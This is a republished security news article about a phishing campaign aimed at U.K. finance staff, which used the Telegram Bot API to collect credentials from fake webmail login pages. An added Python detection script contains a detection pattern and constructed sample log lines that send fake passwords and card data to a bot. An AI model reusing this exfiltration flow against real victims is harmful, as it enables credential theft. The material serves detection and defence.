Thursday, February 25, 2021
Primarius Group
PG-Intel
Fraudsters Using Telegram API to Harvest Credentials

in Risk Management


Application Security, Cybercrime, Digital Identity

Phishing Campaign Bypasses Secure Email Gateway

Prajeet Nair (@prajeetspeaks) •
February 22, 2021    

Credentials are posted to the Telegram API and the user is redirected. (Source: Cofense)

A recently discovered phishing campaign attempted to steal victims' credentials by abusing the Telegram messaging app's API as the collection point for credentials entered on look-alike login pages, a setup that helped the campaign bypass security tools such as secure email gateways, according to researchers at security firm Cofense.



This particular phishing attack appeared active in mid-December 2020 and has since stopped. The targets of these malicious emails primarily worked in the U.K. financial services sector, Cofense notes.


While the Telegram application offers secure, encrypted communication channels for its users, the Cofense report notes that the service also offers API options that allow users to build programs that use the app's messages as an interface. In this case, the fraudsters used that API to receive credentials submitted on realistic-looking phishing pages, rather than standing up their own drop server, which helped the pages slip past security tools.


"For this particular campaign, they spoofed an email account that appeared to an internal user as legitimate," says Jake Longden, a threat analyst at Cofense. "Then they used a domain as the site for the URL redirection that probably at the time wasn't a known bad website, but which is now labeled as malicious."

Telegram is an encrypted messaging app with more than 500 million monthly active consumer and business users. Regular cloud chats are encrypted only between the client and Telegram's servers, not end to end; end-to-end encryption is available through the app's separate "Secret Chats" feature.

How the Phishing Attacks Worked


The targets of this particular campaign were sent phishing emails that appeared to come from an internal source, with addresses such as "support@internal.com," but which actually originated from a source outside the organization, according to the report.


The phishing emails typically carry an urgent alert in the subject line, such as "Review All Pending Messages," designed to get the potential victim to open the message, Cofense notes.

"The user is presented with a notice advising that they have messages to review. The bold and large title draws attention, and is followed by further information to clarify the purpose of the email," according to the report. "Then there is a button for the user to click to 'Release All' the blocked emails to their inbox."


If the targeted victim clicks the link to check the messages, they are taken to a malicious domain hosting a page, wired to the Telegram API, that is designed to look like a webmail login page and asks for credentials, according to the report. The page also pulls the user's email address from the URL and pre-fills it, to give the page another layer of legitimacy.


After the user's password and other credentials are harvested, the data is sent through the Telegram API to a bot and chat that the fraudsters control, while the victim sees a message that the account has been updated, Cofense notes.


"Once the malicious domain has been identified, it can be blocked. However, by using the Telegram API, the threat actor is working to circumvent interference," according to the report. "They are complicating methods for removing stored credentials that have been harvested, and can view and access these credentials at their convenience on a page they control."
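The flow described above (credentials posted to the Telegram Bot API, then the victim redirected) leaves a distinctive trace in outbound web traffic: a request to api.telegram.org whose path has the form /bot<token>/sendMessage. The Python script below is an added example, not code from Cofense or from this article. It scans constructed proxy log lines for that pattern, pulls out the bot ID and chat_id (what you would pass to Telegram's abuse contact or put in a block rule), strips a Base64 layer if the harvested text is wrapped in one (the same wrapping the Malwarebytes research mentioned later in this article describes for card data), and separately flags lure URLs that carry the victim's email address in the fragment, as the phishing page described above does. The log format, bot token, chat ID, hostnames and credentials in it are all made up for illustration.

```python
"""Flag credential exfiltration through the Telegram Bot API in proxy logs.

Added example, not code from Cofense or the article. The bot token, chat id,
hostnames and log lines below are constructed for illustration only.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, quote, urlsplit

TELEGRAM_API_HOST = "api.telegram.org"
# Bot API requests look like https://api.telegram.org/bot<token>/<method>.
# A token is "<numeric bot id>:<secret>"; the secret length is kept loose on purpose.
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d{5,12}:[A-Za-z0-9_-]{25,60})/(?P<method>[A-Za-z]+)$")
# Methods a harvesting page would use to push stolen data into the operator's chat.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed log format, one request per line:
#   <timestamp> <client ip> <http verb> <url> <status>
LOG_LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<verb>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


@dataclass
class Finding:
    ts: str
    src: str
    bot_id: str             # numeric half of the token, enough to report the bot to Telegram
    method: str
    chat_id: Optional[str]
    text: Optional[str]     # the exfiltrated message after any Base64 layer is removed


def maybe_b64decode(value: str) -> str:
    """Return the decoded text if value is Base64 wrapping printable UTF-8, else value unchanged."""
    stripped = value.strip()
    if len(stripped) < 8 or len(stripped) % 4 or not B64_RE.match(stripped):
        return value
    try:
        decoded = base64.b64decode(stripped, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value
    return decoded if decoded.isprintable() else value


def inspect_request(ts: str, src: str, url: str) -> Optional[Finding]:
    """Return a Finding if url is a Telegram Bot API call that pushes data out of the network."""
    parts = urlsplit(url)
    if parts.hostname != TELEGRAM_API_HOST:
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m or m.group("method") not in EXFIL_METHODS:
        return None
    params = parse_qs(parts.query)
    text = params.get("text", [None])[0]
    return Finding(
        ts=ts,
        src=src,
        bot_id=m.group("token").split(":")[0],
        method=m.group("method"),
        chat_id=params.get("chat_id", [None])[0],
        text=maybe_b64decode(text) if text else None,
    )


def lure_email(url: str) -> Optional[str]:
    """Return an e-mail address carried in the query or fragment of a lure URL, if any."""
    parts = urlsplit(url)
    m = EMAIL_RE.search(parts.query + " " + parts.fragment)
    return m.group(0) if m else None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        f = inspect_request(m.group("ts"), m.group("src"), m.group("url"))
        if f:
            findings.append(f)
    return findings


# Constructed sample traffic: a normal request, the lure page opened with the victim's
# address in the fragment, a plaintext exfil, and a Base64-wrapped exfil (made-up data).
_TOKEN = "123456789:AAExampleTokenForIllustration0123456789"
_SECRET = "Email: alice@example.co.uk Password: Winter2020!"
_CARD = "cc=4111111111111111 exp=12/24 cvv=123"
SAMPLE_LOG = [
    "2020-12-14T09:58:01Z 10.1.2.3 GET https://www.example.com/ 200",
    "2020-12-14T09:58:40Z 10.1.2.3 GET https://review-pending-mail.example/index.html#alice@example.co.uk 200",
    f"2020-12-14T09:59:12Z 10.1.2.3 GET https://api.telegram.org/bot{_TOKEN}/sendMessage?chat_id=987654321&text={quote(_SECRET)} 200",
    f"2020-12-14T10:03:55Z 10.1.2.9 POST https://api.telegram.org/bot{_TOKEN}/sendMessage?chat_id=987654321&text={quote(base64.b64encode(_CARD.encode()).decode())} 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.src} bot={f.bot_id} chat={f.chat_id} {f.method}: {f.text}")
```

Two caveats apply. The script assumes a proxy that decrypts TLS and logs full URLs; without interception you see only the CONNECT to api.telegram.org, which is still worth an alert from a workstation that has no business talking to a bot API. It also only reads query strings, so a kit that POSTs a form body to the same endpoint shows up here with an empty text field; the host and /bot<token>/ path are still visible and are enough to alert on. Blocking api.telegram.org outright can break legitimate use, so start with the alert and the extracted bot ID.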


Telegram Abuse


Other security researchers have found cases in which fraudsters and cybercriminals abuse other features of Telegram for their own purposes.


In September 2020, security firm Malwarebytes found that some fraudsters had started using Telegram as a way to sweep up payment card data from victims, sending Base64-encoded strings to a bot (see: Fraudsters Use Telegram App to Steal Payment Card Data).


Researchers with Juniper Threat Labs found hackers targeting victims with a Trojan that then created a secure Telegram channel to send data back to the attackers' command-and-control server, according to a September 2019 report.



© 2020 All Rights Reserved.

Brought to you by Primarius Group